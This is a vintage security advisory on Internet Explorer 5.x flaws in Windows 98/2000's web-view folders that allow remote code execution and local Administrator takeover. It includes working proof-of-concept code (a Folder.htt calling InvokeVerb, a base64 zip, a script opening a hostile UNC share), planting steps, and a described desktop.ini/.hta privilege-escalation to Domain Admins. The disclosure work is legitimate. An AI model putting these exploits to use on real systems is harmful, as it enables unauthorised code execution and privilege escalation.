COMMAND
IE
SYSTEMS AFFECTED
Win systems
PROBLEM
Georgi Guninski found following (Security Advisory #18). IE
5.5/5.x for Win98 may execute arbitrary files that can be accessed
thru Microsoft Networking. Also local Administrator compromise at
least on default Windows 2000.
Systems affected are:
- For remote file execution: IE 5.5,5.x/Windows 98, the files must
be accessible thru Microsoft Networking.
- For local Administrator compromise on Windows 2000: default
Windows 2000 installation,tested with IE 5.5 as well.
This advisory contains two issues, but since they use common
ActiveX control and concept, so Georgi decided to post them in one
advisory.
I) IE 5.x may execute arbitrary programs when visiting a web page,
reading HTML based mail with Outlook or simply browsing folders
(that may be remote) as web pages (which is the default
configuration for Windows).
II) Local Administrator compromise on default installation of
Windows 2000. Have not tested with IE 5.5 installed, but
believe to work. In order to be compromised, the Administrator
must open a local folder as a web page (which is the default
option when browsing folders). In both cases a malicous person
may take full control over user's computer/server.
Browsing web sites and reading HTML mail may be dangerous, but it
turns out that browsing local or remote folders is also dangerous.
The exploits use a feature of Windows 98/2000 that allows viewing
folders as web pages due to the integration of IE in the operating
system.
This allows putting active content when browsing local/remote
folder, which turns out to be dangerous. The way the folder looks
when viewed as a web page is controlled by a file Folder.htt
located in the folder, which is a special HTML file that may
contain Active Scripting and ActiveX Objects. If you want to view
the files in the folder, you must use an ActiveX Control - Shell
DefView, which basically contains the functionality of the old
Explorer.
The Shell DefView Control has an interesting method - InvokeVerb,
which is used to perform actions with the currently selected file
- for example showing its properties and the most interesting
part - opening/executed it.
It has a string parameter - the action to perform on a file or
folder. Microsoft has tried to secure it - it yields a security
error if you pass an argument to it and that is reasonable. But
amazingly, if you just do InvokeVerb() with no parameters - it
executes the default action on the file/folder and the action is
Open (Execute).
So, to exploit this we create a folder and place a malicous file
that we want to execute - for example "a.bat". Also in that
folder, we put the active file Folder.htt.
The code of Folder.htt:
<html>
<body>
<script>
setTimeout("f()",2000);
function f() {
FileList.focus();
FileList.FocusedItem.InvokeVerb();
}
</script>
<H1>Hello World<BR>Written by Georgi Guninski</H1>
<object id=FileList border=0 tabindex=1
classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">
</object>
</body>
</html>
So what the code does? FileList.focus() focuses the first file
in our folder - in our example a.bat. Note: a.bat may be not the
first file in our folder, this depends on the arrangement of the
icons in the folder (default is by name). But to circumvent this
we may put additional files with different names/dates/extensions
so whatever the arrangement is, our target file is first in the
list. FileList.FocusedItem.InvokeVerb() does the real job - it
opens(executes) the focused file. So we create a customized
folder with malicous content, place it somewhere probably remote
and wait or force a victim to open it. ac.zip for demonstration
is available at:
http://www.nat.bg/~joro/ac.zip
Here is the zip file in MIMEd form:
---
Content-Type: application/octet-stream; name="ac.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="ac.zip"
Content-MD5: enysodUgv/qaWmM9zgdGfw==
UEsDBBQAAAAIANBoDSlOT//c9wAAAE0BAAAKAAAARm9sZGVyLmh0dF2Qy07DMBBF95HyD6Os
Eok0TigUaBKptE1biRVCdF07EzB1bGQ7iArx79jhsWBmMUfzuFea8tn2og6Dkqr2BB4M0/zV
OjJoH3iParBx1MVJdFYQQpJ5GHSDZJYrCa4LH2EAPhou8I4bO+kUG0yczMcu/J82fortzmI/
2ck3dcRH1DT2sp/OPPtz91lu83qLQijYKy3a8va+3mtuLUqgJ9ig0k8cNoPk0hx5mbltd6Po
CzILvK1+TYEq3aKuCNgD5bLF9yoHJg7GuKWICVdu8quCNOsVSaez83Wa544W15fLlJAlmTar
GblYFJGXz771R/Q/G+HniV9QSwMEFAAAAAgAsm1sKPzQ9MWRAAAACgEAAAsAAABkZXNrdG9w
LmluaY2P0QrCIBhG7wUfxc3JEgt2sTaFLqIg6GZ0MeiXSaahRkH07o31At6f7/CdQb7TaQJr
lbdXCGcDr3jBqAc9Pm1qPqu1qJWSlDDR16SqOkVayTmhglK2ZbJinH0xyuOydRgNeeh89Qgh
mpj23pkbhEYbC5uy/OcUU0qLrVgaOzvGuHPaz7POO23CXc344dFQjH5QSwMECgAAAAAANWUN
KTbDir4oAAAAKAAAAAUAAABhLmJhdGVjaG8gIldyaXR0ZW4gYnkgR2VvcmdpIEd1bmluc2tp
Ig0KUGF1c2VQSwECMgsUAAAACADQaA0pTk//3PcAAABNAQAACgAAAAAAAAABACIAtoEAAAAA
Rm9sZGVyLmh0dFBLAQIyCxQAAAAIALJtbCj80PTFkQAAAAoBAAALAAAAAAAAAAEAIgC2gR8B
AABkZXNrdG9wLmluaVBLAQIyCwoAAAAAADVlDSk2w4q+KAAAACgAAAAFAAAAAAAAAAEAIAD/
gdkBAABhLmJhdFBLBQYAAAAAAwADAKQAAAAkAgAAAAA=
-----
For I) IE 5.x may execute arbitrary files when visiting a web
page, reading HTML based mail with Outlook or simply browsing
folders (that may be remote) as web pages (which is the default
configuration for Windows). To test it remotely with Windows 98:
Unzip ac.zip in a UNC share for example: \\HOSTILEUNCORIP\SHARE
Browse \\HOSTILEUNCORIP\SHARE as a web page from IE.
Or open a web page containing:
<SCRIPT>
window.open("\\\\HOSTILEUNCORIP\\SHARE");
</SCRIPT>
Note: Sometimes the remote test does not work the first time.
Try again (browse the folder again or reload the web page) if it
does not work the first time.
For II) Local Administrator compromise on default installation of
Windows 2000. Have not tested with IE 5.5 installed, but believe
to work. In order to be compromised, the Administrator must open
a local folder as a web page (which is the default option when
browsing folders). A local user may create a customized folder
and if the the Administrator open it as a web page (which is
default) then the administrator account is compromised. It is
amazing that when the Administrator opens the folder a security
warning "...may be unsafe...Do you want to allow it to be
initialized an accessed by scripts?" with "Yes/No" buttons.
Whatever button you choose, the content is executed. This is
funny!
As an ordinary user, unzip ac.zip in any folder, for example ac.
1) Open ac from My Computer
2) Select View->Customize this Folder->Next->Customize->Choose
or edit...->Next
3) Select Choose a template->Current->Next->Finish
Wait for the Administrator to open the folder as a web page.
Greg Anuzelli added following. This is an issue that he submitted
to Microsoft. He was going to wait to hear from them before
submitting this public, but when (only several hours later) when
he saw Georgi Guninski's Customized Folders issue.
He found a problem with the way that Explorer handles Custom
Folders that could be used to execute arbitrary commands under the
security context of an unknowing user.
If you use Web View and customize a folder, a desktop.ini and a
"Folder Settings" folder are created. The desktop.ini
"PersistMoniker" line specifies the .htt file to use to create
the view. This view is rendered in the "Local Intranet" zone, so
only controls marked "Safe for scripting" can be used. The
problem is that you can tell desktop.ini to use an .hta file
instead, which does not operate in a security sandbox. The
desktop.ini file inherits the same ACL as the directory, so a
user that has write access to a folder will also have write access
to desktop.ini.
Here's one obvious example of how this vulnerability can be
exploited: A popular share exists on a file server. Joe User (a
Domain User) has change access to this share. He customizes the
folder and create a .hta that tries to add him or her to the
Domain Admins group (via NET USER or ADSI, whatever). He or she
modifies the desktop.ini to point to the .hta a waits for a Domain
Admin (with Web View enabled) to browse to the share. A problem
with this exploit is that the window that is supposed to display
the contents of the share does not get updated, but if you wanted
to you could write code to update the windows properly just like
the original folder.htt does.
Greg tested this on Windows 2000 Server & Pro with and without
SP1, on IE 5.0 & 5.5, and with all the latest security patches.
There may be other "bad" extensions other than .hta that work,
but he tried .cmd, .bat, and .wsf without success.
SOLUTION
Do not browse folders as web pages. Remote attack may be stopped
by a firewall that blocks Microsoft Networking and you are
encouraged to confige firewall in such way. But application holes
must be fixed at application level and not rely on firewall
behavior!
Further, possible workarounds involve removing the MODIFY
permissions from Power Users on all .HTT's on your systems
(thereby limiting the possible exploit to Administrators).